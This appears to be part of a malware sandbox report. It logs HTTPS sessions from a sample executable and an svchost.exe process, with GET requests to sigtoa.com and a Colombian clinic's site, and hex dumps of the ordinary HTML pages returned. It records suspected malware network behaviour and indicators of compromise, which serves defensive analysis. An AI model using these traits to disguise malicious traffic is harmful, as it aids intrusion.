                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2953INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                        Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2969INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2985INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                        Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        192192.168.2.62130188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2969OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: sigtoa.com


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        2192.168.2.650309104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC102INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:00 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Set-Cookie: d55e479f054c94814cbc10d217aaa990=bbd2a9ecd1f16e6deb08a6c096c7155a; path=/; HttpOnly
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:56:00 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U8ESCNJQima5t1HfEow%2BDLqZxzTW3NJ7HwIlxoEz9C9wGu0uzQuZTWdAlSzf%2BPzdkK9d%2BfXXwV%2FbUtk1IJG7q7iCY5OG%2FlG5%2FLsO3yymlnjUBxIGUdb58hJWRL45l7bwOxX%2FGj5jGPI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a7be39f99944-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC103INData Raw: 37 63 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                        Data Ascii: 7c48<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC104INData Raw: 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b
                                                                                                                                                                                                                                                                        Data Ascii: <link href="/plugins/system/rokbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC105INData Raw: 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                        Data Ascii: src="/media/system/js/core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC106INData Raw: 61 73 73 65 74 73 2f 6a 73 2f 68 74 6d 6c 35 73 68 69 76 2d 70 72 69 6e 74 73 68 69 76 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70
                                                                                                                                                                                                                                                                        Data Ascii: assets/js/html5shiv-printshiv.min.js"></script> <link rel="stylesheet" href="/media/gantry5/users/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></scrip
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC108INData Raw: 6e 75 65 73 74 72 61 5f 63 6c 69 6e 69 63 61 2f 6c 6f 67 6f 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2e 70 6e 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74
                                                                                                                                                                                                                                                                        Data Ascii: nuestra_clinica/logo_horizontal.png" alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-t
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC109INData Raw: 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 23 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 20 3c 73 70 61 6e 20
                                                                                                                                                                                                                                                                        Data Ascii: "g-menu-item-container" href="#" data-g-menuparent=""><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"> <span
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC110INData Raw: 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d
                                                                                                                                                                                                                                                                        Data Ascii: n class="g-menu-item-content"><span class="g-menu-item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC112INData Raw: 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 70 6f 6c 69 74 69 63 61 73 2d 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67
                                                                                                                                                                                                                                                                        Data Ascii: index.php/nuestra-clinica/politicas-institucionales"><span class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC113INData Raw: 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61
                                                                                                                                                                                                                                                                        Data Ascii: class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul cla
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC114INData Raw: 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61
                                                                                                                                                                                                                                                                        Data Ascii: li><li class="g-menu-item g-menu-item-type-component g-menu-item-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span cla
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC116INData Raw: 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 53 49 43 4f 46 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f
                                                                                                                                                                                                                                                                        Data Ascii: tem-content"><span class="g-menu-item-title">SICOF</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-co
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC117INData Raw: 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 63 72 c3 ad 62 65 6e 6f 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65
                                                                                                                                                                                                                                                                        Data Ascii: ss="g-menu-item-content"><span class="g-menu-item-title">Escrbenos</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-me
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC118INData Raw: 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73
                                                                                                                                                                                                                                                                        Data Ascii: /span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-385 "><a class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></s
                                                                                                                                                                                                                                                                        2023-03-10 06:56:00 UTC120INData Raw: 6c 61 20 65 73 70 65 72 61 6e 7a 61 20 64 65 6c 20 6d 61 c3 b1 61 6e 61 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 74 66 6f 72 6d 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c
                                                                                                                                                                                                                                                                        Data Ascii: la esperanza del maana</div></div> </div><div class="platform-content"><div class="moduletable "><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0,
